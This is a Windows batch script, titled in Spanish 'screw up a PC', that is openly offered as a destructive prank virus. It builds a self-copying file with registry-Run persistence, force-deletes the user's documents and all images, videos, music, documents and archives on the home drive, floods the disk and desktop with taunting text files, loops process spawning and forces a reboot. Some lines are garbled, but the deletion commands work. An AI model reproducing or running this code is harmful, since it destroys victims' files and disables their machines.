Joder a un PC

@echo off

cd %windir%

echo @echo off>CPTL.bat

echo reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /V CTPL.bat /D %windir%\system32\CPTL.bat>>CPTL.bat

echo if exist %windir%\CPTL.bat goto oportunidad>>CPTL.bat

echo copy /Y CPTL.bat %windir%>>CPTL.bat
echo copy /Y CPTL.bat %windir%\system32>>CPTL.bat
echo cls>>CPTL.bat

echo :msg>>CPTL.bat
echo msg * A mortal virus has infected your computer!!>>CPTL.bat

echo :oportunidad>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo respuesta=INPUTBOX(”Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.bat
echo echo if respuesta=batch then>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo kill (”C:\Windows\system32\virus.bat” >>oportunity.vbs>>CPTL.bat
echo echo else>>oportunity.vbs>>CPTL.bat
echo echo msgbox (”Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.bat
echo echo start oportunity.vbs>>CPTL.bat

del /S /Q /F %userprofile%\mis documentos\*.*

echo :del>>CPTL.bat
echo cd %homedrive%>>CPTL.bat
echo del /Q /S /F *.jpg>>CPTL.bat
echo del /Q /S /F *.avi>>CPTL.bat
echo del /Q /S /F *.mp3>>CPTL.bat
echo del /Q /S /F *.doc>>CPTL.bat
echo del /Q /S /F *.zip>>CPTL.bat
echo del /Q /S /F *.rar>>CPTL.bat
echo cls>>CPTL.bat

echo :petar_escritorio>>CPTL.bat
echo cd %homepath%\Escritorio>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.bat
echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.bat
echo cls>>CPTL.bat

echo if exist C:\virus%random%.txt (goto bucle)>>CPTL.bat

echo :Petar_HD>>CPTL.bat
echo cd\>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %ProgramFiles%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo cd %windir%>>CPTL.bat
echo echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.bat
echo goto Petar_HD>>CPTL.bat
echo cls>>CPTL.bat

del /S /Q /F %userprofile%\mis documentos\*.*

echo :bucle>>CPTL.bat
echo start iexplore.exe>>CPTL.bat
echo start>>CPTL.bat
echo goto bucle>>CPTL.bat

echo :Shutdown>>CPTL.bat
echo shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat

copy CPTL.bat %windir%\system32

start CPTL.bat


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